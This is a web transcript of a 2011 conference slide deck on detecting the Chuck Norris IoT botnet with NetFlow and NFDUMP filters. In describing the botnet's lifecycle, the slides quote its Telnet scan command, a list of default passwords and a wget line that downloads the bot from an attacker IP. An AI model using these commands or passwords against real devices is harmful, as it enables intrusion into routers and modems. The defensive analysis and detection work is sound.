detecting botnets with netflow
play

Detecting Botnets with NetFlow V. Krmek, T. Plesnk - PowerPoint PPT Presentation

Aug 19, 2022 •262 likes •906 views

Detecting Botnets with NetFlow V. Krmek, T. Plesnk {vojtec|plesnik}@ics.muni.cz FloCon 2011, January 12, Salt Lake City, Utah Presentation Outline NetFlow Monitoring at MU Chuck Norris Botnet in a Nutshell Botnet Detection Methods

  1. Detecting Botnets with NetFlow V. Krmíček, T. Plesník {vojtec|plesnik}@ics.muni.cz FloCon 2011, January 12, Salt Lake City, Utah

  2. Presentation Outline NetFlow Monitoring at MU Chuck Norris Botnet in a Nutshell Botnet Detection Methods NfSen Botnet Detection Plugin Conclusion Krmíček, Plesník Detecting Botnets with NetFlow 2 / 28

  3. Part I NetFlow Monitoring at MU Krmíček, Plesník Detecting Botnets with NetFlow 3 / 28

  4. Masaryk University, Brno, Czech Republic 9 faculties: 200 departments and institutes 48 000 students and employees 15 000 networked hosts 2x 10 gigabit uplinks to CESNET Number of Flows in MU Network (5-minute Window) Interval Flows Packets Bytes 1500000 Second 5 k 150 k 132 M Minute 300 k 9 M 8 G Hour 15 M 522 M 448 G 1000000 Day 285 M 9.4 G 8 T Week 1.6 G 57 G 50 T 500000 Average traffic volume at the edge links in peak hours. 0 Mon Tue Wed Thu Fri Sat Sun Krmíček, Plesník Detecting Botnets with NetFlow 4 / 28

  5. FlowMon Probes at Masaryk University Campus FlowMon probes: 25 NetFlow collectors: 6 Krmíček, Plesník Detecting Botnets with NetFlow 5 / 28

  6. NetFlow Monitoring at Masaryk University FlowMon probe FlowMon probe FlowMon probe NetFlow data generation Krmíček, Plesník Detecting Botnets with NetFlow 6 / 28

  7. NetFlow Monitoring at Masaryk University FlowMon probe NetFlow v5/v9 FlowMon probe NetFlow collector FlowMon probe NetFlow data NetFlow data generation collection Krmíček, Plesník Detecting Botnets with NetFlow 6 / 28

  8. NetFlow Monitoring at Masaryk University FlowMon SPAM probe detection NetFlow worm/virus v5/v9 detection FlowMon probe NetFlow intrusion collector detection FlowMon probe NetFlow data NetFlow data NetFlow data generation collection analyses Krmíček, Plesník Detecting Botnets with NetFlow 6 / 28

  9. NetFlow Monitoring at Masaryk University http WWW FlowMon SPAM probe detection NetFlow worm/virus v5/v9 mail detection FlowMon mailbox probe NetFlow intrusion collector syslog detection FlowMon syslog probe server NetFlow data NetFlow data NetFlow data incident generation collection analyses reporting Krmíček, Plesník Detecting Botnets with NetFlow 6 / 28

  10. From NetFlow Monitoring to Botnet Discovery Network Behaviour Analysis at MU Identifies malware from NetFlow data . Watch what’s happening inside the network 24/7. Single purpose detection patterns ( scanning, botnets, ... ). Complex models of the network behavior. Even Chuck Norris Can’t Resist NetFlow Monitoring Unusual worldwide TELNET scan attempts. Mostly comming from ADSL connections . New botnet Chuck Norris discovered at December 2009. Detailed analysis followed. Krmíček, Plesník Detecting Botnets with NetFlow 7 / 28

  11. Part II Chuck Norris Botnet in a Nutshell Krmíček, Plesník Detecting Botnets with NetFlow 8 / 28

  12. Chuck Norris Botnet Linux malware – IRC bots with central C&C servers. Attacks poorly-configured Linux MIPSEL devices. Vulnerable devices – ADSL modems and routers . Uses TELNET brute force attack for infection. Users are not aware about the malicious activities. Missing anti-malware solution to detect it. Discovered at Masaryk University on 2 December 2009. The malware got the Chuck Norris moniker from a comment in its source code [R]anger Killato : in nome di Chuck Norris ! Krmíček, Plesník Detecting Botnets with NetFlow 9 / 28

  13. Botnet Lifecycle Scanning for vulnerable devices in predefined networks IP prefixes of ADSL networks of worldwide operators network scanning – # pnscan -n30 88.102.106.0/24 23 Infection of a vulnerable device TELNET dictionary attack – 15 default passwords admin, password, root, 1234, dreambox, blank password IRC bot initialization IRC bot download and execution on infected device # wget http://87.98.163.86/pwn/syslgd;... Botnet C&C operations further bots spreading and C&C commands execution DNS spoofing and denial-of-service attacks Krmíček, Plesník Detecting Botnets with NetFlow 10 / 28

  14. More about Chuck Norris Botnet Chuck Norris botnet lifecycle in details and further information are available at the CYBER project page: http://www.muni.cz/ics/cyber/chuck_norris_botnet 1. join ##soldiers## C&C bot (IRC) stop remote access STOP server 2. Topic: !* init-cmd (ports 22-80) (get scan-tools) infected device web server 3. wget scan-tools Krmíček, Plesník Detecting Botnets with NetFlow 11 / 28

  15. Part III Botnet Detection Methods Krmíček, Plesník Detecting Botnets with NetFlow 12 / 28

  16. Detection Methods Overview Five Detection Methods Telnet scan detection. Connections to botnet distribution sites detection. Connections to botnet C&C centers detection. DNS spoofing attack detection. ADSL string detection. Methods Correspond to Botnet Lifecycle Applied to NetFlow Data Defined as NFDUMP filters. Implemented to NfSen collector. Krmíček, Plesník Detecting Botnets with NetFlow 13 / 28

  17. Telnet Scan Detection – Phase I Incoming and outgoing TCP SYN scans on port 23. infected device NFDUMP detection filter: Krmíček, Plesník Detecting Botnets with NetFlow 14 / 28

  18. Telnet Scan Detection – Phase I Incoming and outgoing TCP SYN scans on port 23. infected device local network NFDUMP detection filter: (net local_network ) Krmíček, Plesník Detecting Botnets with NetFlow 14 / 28

  19. Telnet Scan Detection – Phase I Incoming and outgoing TCP SYN scans on port 23. list of C class networks to scan 147.251.20.x infected device 147.251.3.x 147.251.18.x local 147.251.4.x network NFDUMP detection filter: (net local_network ) Krmíček, Plesník Detecting Botnets with NetFlow 14 / 28

  20. Telnet Scan Detection – Phase I Incoming and outgoing TCP SYN scans on port 23. list of C class networks to scan 147.251.20.x infected TCP/23 device 147.251.3.x 147.251.18.x local 147.251.4.x network NFDUMP detection filter: (net local_network ) and (dst port 23) and (proto TCP) Krmíček, Plesník Detecting Botnets with NetFlow 14 / 28

  21. Telnet Scan Detection – Phase I Incoming and outgoing TCP SYN scans on port 23. list of C class networks to scan 147.251.20.x infected TCP/23 device 147.251.3.x 147.251.18.x local 196.142.8.x 147.251.4.x network 214.12.83.x NFDUMP detection filter: (net local_network ) and (dst port 23) and (proto TCP) Krmíček, Plesník Detecting Botnets with NetFlow 14 / 28

  22. Telnet Scan Detection – Phase I Incoming and outgoing TCP SYN scans on port 23. list of C class networks to scan 147.251.20.x infected TCP/23 device SYN/RESET flags 147.251.3.x 147.251.18.x local 196.142.8.x 147.251.4.x network 214.12.83.x NFDUMP detection filter: (net local_network ) and (dst port 23) and (proto TCP) and ((flags S and not flags ARPUF) or (flags SR and not flags APUF)) Krmíček, Plesník Detecting Botnets with NetFlow 14 / 28

  23. Connections to Botnet Distribution Sites – Phase II Bot’s web download requests from infected host. local network NFDUMP detection filter: 1 IP addresses of attacker’s botnet distribution web servers Krmíček, Plesník Detecting Botnets with NetFlow 15 / 28

  24. Connections to Botnet Distribution Sites – Phase II Bot’s web download requests from infected host. local network infected device NFDUMP detection filter: (src net local_network ) 1 IP addresses of attacker’s botnet distribution web servers Krmíček, Plesník Detecting Botnets with NetFlow 15 / 28

  25. Connections to Botnet Distribution Sites – Phase II Bot’s web download requests from infected host. botnet distribution web server botnet distribution local web server network infected device botnet distribution web server NFDUMP detection filter: (src net local_network ) and (dst ip web_servers 1 ) 1 IP addresses of attacker’s botnet distribution web servers Krmíček, Plesník Detecting Botnets with NetFlow 15 / 28

  26. Connections to Botnet Distribution Sites – Phase II Bot’s web download requests from infected host. botnet distribution web server botnet distribution local web server network infected device TCP/80 botnet distribution web server NFDUMP detection filter: (src net local_network ) and (dst ip web_servers 1 ) and (dst port 80) and (proto TCP) 1 IP addresses of attacker’s botnet distribution web servers Krmíček, Plesník Detecting Botnets with NetFlow 15 / 28

  27. Connections to Botnet Distribution Sites – Phase II Bot’s web download requests from infected host. botnet distribution web server botnet distribution local web server network infected device TCP/80 SYN/ACK flags botnet distribution web server NFDUMP detection filter: (src net local_network ) and (dst ip web_servers 1 ) and (dst port 80) and (proto TCP) and (flags SA and not flag R) 1 IP addresses of attacker’s botnet distribution web servers Krmíček, Plesník Detecting Botnets with NetFlow 15 / 28

  28. Connections to Botnet C&C Center – Phase III Bot’s IRC traffic with command and control center. local network NFDUMP detection filter: 2 IP address of an attacker’s IRC server (Botnet C&C center) Krmíček, Plesník Detecting Botnets with NetFlow 16 / 28

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

NetFlow Analysis: Detecting covert channels on the network Detecting malicious traffic by using

NetFlow Analysis: Detecting covert channels on the network Detecting malicious traffic by using

NetFlow Analysis: Detecting covert channels on the network Detecting malicious traffic by using NetFlow data By: Joey Dreijer, Student OS3 5-07-14 1 NetFlow Analysis: Detecting covert channels on the network Gathering NetFlow data

346 views • 16 slides
Detecting Botnets with Temporal Persistence Jaideep Chandrashekar Frederic

Detecting Botnets with Temporal Persistence Jaideep Chandrashekar Frederic

Detecting Botnets with Temporal Persistence Jaideep Chandrashekar Frederic Giroire Nina Taft Eve Schooler Mascotte project I3S (CNRS, Univ. of Nice) Intel Labs INRIA Sophia Antipolis Botnets: Why care? Botnet

888 views • 46 slides
Effective features for detecting Effective features for detecting IRC botnets IRC botnets

Effective features for detecting Effective features for detecting IRC botnets IRC botnets

Effective features for detecting Effective features for detecting IRC botnets IRC botnets Claudio Mazzariello, Carlo Sansone Carlo Sansone Claudio Mazzariello, Dipartimento di Informatica e Sistemistica Dipartimento di Informatica e

614 views • 19 slides
Detecting DGA malware using NetFlow Martin Grill , Ivan Nikolaev , Veronica Valeros

Detecting DGA malware using NetFlow Martin Grill , Ivan Nikolaev , Veronica Valeros

Detecting DGA malware using NetFlow Martin Grill , Ivan Nikolaev , Veronica Valeros , Martin Rehak Cisco Systems, Inc. magrill@cisco.com, inikolae@cisco.com, vvaleros@cisco.com, marrehak@cisco.com Faculty of

606 views • 6 slides
Peer-to-Peer Botnet Detection Using NetFlow Connor Dillon System and Network Engineering

Peer-to-Peer Botnet Detection Using NetFlow Connor Dillon System and Network Engineering

Peer-to-Peer Botnet Detection Using NetFlow Connor Dillon System and Network Engineering University of Amsterdam Master thesis presentation, July 3 rd 2014 Supervisor: Pepijn Janssen RedSocks Botnets Large group of infected computers,

610 views • 23 slides
BotNets BotNets- Cybe Cyber T r Torrirism orrirism Ba Batt ttling ling th the t e thr

BotNets BotNets- Cybe Cyber T r Torrirism orrirism Ba Batt ttling ling th the t e thr

BotNets BotNets- Cybe Cyber T r Torrirism orrirism Ba Batt ttling ling th the t e thr hrea eats ts of inte of intern rnet et Assoc. Prof. Dr. Sureswaran Ramadass National Advanced IPv6 Center - Director Why Talk About Botnets?

722 views • 35 slides
NetFlow Ne t wor k M a na g e me nt W or k s h op APRI COT 2010 Kua l a Lumpur Contents

NetFlow Ne t wor k M a na g e me nt W or k s h op APRI COT 2010 Kua l a Lumpur Contents

NetFlow Ne t wor k M a na g e me nt W or k s h op APRI COT 2010 Kua l a Lumpur Contents Netflow What it is and how it works Uses and Applications Vendor Configurations/Implementation Cisco and Juniper NetFlow tools

1.24k views • 62 slides
Overview of NetFlow NetFlow and ITSG -33 Existing Monitoring Tools Network

Overview of NetFlow NetFlow and ITSG -33 Existing Monitoring Tools Network

Overview of NetFlow NetFlow and ITSG -33 Existing Monitoring Tools Network Monitoring and Visibility Challenges Technology of the future Q&A What t is NetFlow? Network protocol originally developed by Cisco

560 views • 21 slides
Botnets CS 598: Advanced Internet Presented by: Imranul Hoque How to Study Botnets? Passive

Botnets CS 598: Advanced Internet Presented by: Imranul Hoque How to Study Botnets? Passive

Botnets CS 598: Advanced Internet Presented by: Imranul Hoque How to Study Botnets? Passive analysis Study spam e-mail, DNS queries by bot-infected machines, DNS blacklists, analyze network traffic, etc. Infiltration Todays

686 views • 15 slides
NECST laboratory BOTNETS FUNDING ETC. . @syssecproject SysSec Project:

NECST laboratory BOTNETS FUNDING ETC. . @syssecproject SysSec Project:

PHOENIX & CERBERUS We haz botnets! #Honeynet2014 Stefano Schiavoni, Edoardo Colombo Federico Maggi Lorenzo Cavallaro Stefano Zanero Politecnico Di Milano & Royal Hollway, University of London NECST laboratory BOTNETS FUNDING ETC.

1.28k views • 107 slides
BOTNETS GRAD SEC NOV 21 2017 TODAYS PAPERS BOTNETS Collection of compromised machines

BOTNETS GRAD SEC NOV 21 2017 TODAYS PAPERS BOTNETS Collection of compromised machines

BOTNETS GRAD SEC NOV 21 2017 TODAYS PAPERS BOTNETS Collection of compromised machines (bots) under unified control of an attacker (botmaster) Method of compromise decoupled from method of control Launch a worm/virus, etc.:

790 views • 16 slides
Mylobot, Detecting the Undetected Using Deep Learning Yael Daihes 02 WHO AM I Yael Daihes

Mylobot, Detecting the Undetected Using Deep Learning Yael Daihes 02 WHO AM I Yael Daihes

01 Mylobot, Detecting the Undetected Using Deep Learning Yael Daihes 02 WHO AM I Yael Daihes Security Data Science Team Lead @ Akamai Technologies My things - Botnets, Traffic, Data, Algorithms, Reading, Painting and a bit of Gaming (:

533 views • 42 slides
Using of time characteristic in Netflow data for improvement of protocol detection P. Piska,

Using of time characteristic in Netflow data for improvement of protocol detection P. Piska,

Using of time characteristic in Netflow data for improvement of protocol detection P. Piska, J. Novotn, {piskac|novotny}@ics.muni.cz 3rd NMRG Workshop on NetFlow/IPFIX Usage in Network Management July 30, 2010, Maastricht, The Netherlands

479 views • 26 slides
NetFlow Analysis Jonzy Data Security Analysis, Sr. Information Security Office NetFlow Analysis

NetFlow Analysis Jonzy Data Security Analysis, Sr. Information Security Office NetFlow Analysis

NetFlow Analysis Jonzy Data Security Analysis, Sr. Information Security Office NetFlow Analysis Intrusion Detection, Protection, and Usage Reporting NetFlow is a cornucopia of information that allows for: Intrusion Detection, Bandwidth usage,

665 views • 17 slides
12/6/2013 Detecting Fakes Image Forensics: Detecting Forged Photos 1.Detecting photorealistic

12/6/2013 Detecting Fakes Image Forensics: Detecting Forged Photos 1.Detecting photorealistic

12/6/2013 Detecting Fakes Image Forensics: Detecting Forged Photos 1.Detecting photorealistic graphics 2.Detecting manipulated images Photo manipulation is the application of image editing techniques to photographs in order to create an

306 views • 13 slides
nProbe: an Open Source NetFlow Probe for Gigabit Networks Luca Deri <deri@ntop.org>

nProbe: an Open Source NetFlow Probe for Gigabit Networks Luca Deri <deri@ntop.org>

nProbe: an Open Source NetFlow Probe for Gigabit Networks Luca Deri <deri@ntop.org> NetFlow Traffic Monitoring Cisco NetFlow is a commercial standard for network monitoring and accounting Many companies (e.g. Cisco, Juniper,

430 views • 14 slides
Deep Watershed Transform for Instance Segmentation Min Bai & Raquel Urtasun To appear at

Deep Watershed Transform for Instance Segmentation Min Bai & Raquel Urtasun To appear at

Deep Watershed Transform for Instance Segmentation Min Bai & Raquel Urtasun To appear at IEEE CVPR 2017 in Hawaii Presented at NVIDIA GTC 2017 Semantic Segmentation Input: RGB Image Output at each pixel: Semantic label

465 views • 28 slides
Ultrasonic weather station and their application for atmospheric processes monitoring A.Ya.

Ultrasonic weather station and their application for atmospheric processes monitoring A.Ya.

IMCES SB RAS Ultrasonic weather station and their application for atmospheric processes monitoring A.Ya. Bogushevich, A.A. Tikhomirov Institute of monitoring of climatic and ecological systems Siberian Branch of the Russian Academy of Science

354 views • 34 slides
C ENTER FOR A DVANCED S TUDIES W HEELER H IGH S CHOOL STEM Certified & STEAM Inspired The

C ENTER FOR A DVANCED S TUDIES W HEELER H IGH S CHOOL STEM Certified & STEAM Inspired The

C ENTER FOR A DVANCED S TUDIES W HEELER H IGH S CHOOL STEM Certified & STEAM Inspired The Center for Advanced Studies At Wheeler High School a unique 4-year STEM magnet program for academically advanced students Biology Chemistry

927 views • 34 slides
"The Mis-education of Softw are Testers: Rethinking and Relearning Softw are Quality"

"The Mis-education of Softw are Testers: Rethinking and Relearning Softw are Quality"

BT4 Concurrent Session 6/14/2012 10:15 AM "The Mis-education of Softw are Testers: Rethinking and Relearning Softw are Quality" Presented by: Clinton Sprauve Micro Focus Brought to you by: 340 Corporate Way, Suite 300, Orange Park,

446 views • 10 slides
Linux IoT Botnet Wars and the Lack of Security Hardening Drew Moseley Solutions Architect

Linux IoT Botnet Wars and the Lack of Security Hardening Drew Moseley Solutions Architect

Linux IoT Botnet Wars and the Lack of Security Hardening Drew Moseley Solutions Architect Mender.io Session overview Case-studies of 3 botnets Mirai (August 2016) Hajime (October 2016) BrickerBot (March 2017) Common security

902 views • 28 slides
Reinsurance Reserving: Top-Down versus Bottom-Up Casualty Loss Reserve Seminar September 15,

Reinsurance Reserving: Top-Down versus Bottom-Up Casualty Loss Reserve Seminar September 15,

Reinsurance Reserving: Top-Down versus Bottom-Up Casualty Loss Reserve Seminar September 15, 2011 | Las Vegas, NV Introductions Moderator Mark Littmann, PwC Panelists Gary Blumsohn, Arch Reinsurance Company Arlie Proctor, Munich Re 2

583 views • 20 slides
Jobenomics deals with the process of creating and mass- Jobenomics deals with the process of

Jobenomics deals with the process of creating and mass- Jobenomics deals with the process of

Jobenomics deals with the process of creating and mass- Jobenomics deals with the process of creating and mass- producing local small businesses and jobs. producing local small businesses and jobs. Jobenomics Las Vegas goal is to create

697 views • 53 slides
Project-Based Learning and Community Development 24-10-2015 Institute for Heatlh care studies

Project-Based Learning and Community Development 24-10-2015 Institute for Heatlh care studies

Project-Based Learning and Community Development 24-10-2015 Institute for Heatlh care studies Minjou Lemette and Lisette Rodenburg Community Development Working with new competencies in the Netherlands Paradigm shift in the Netherlands,

298 views • 26 slides

More recommend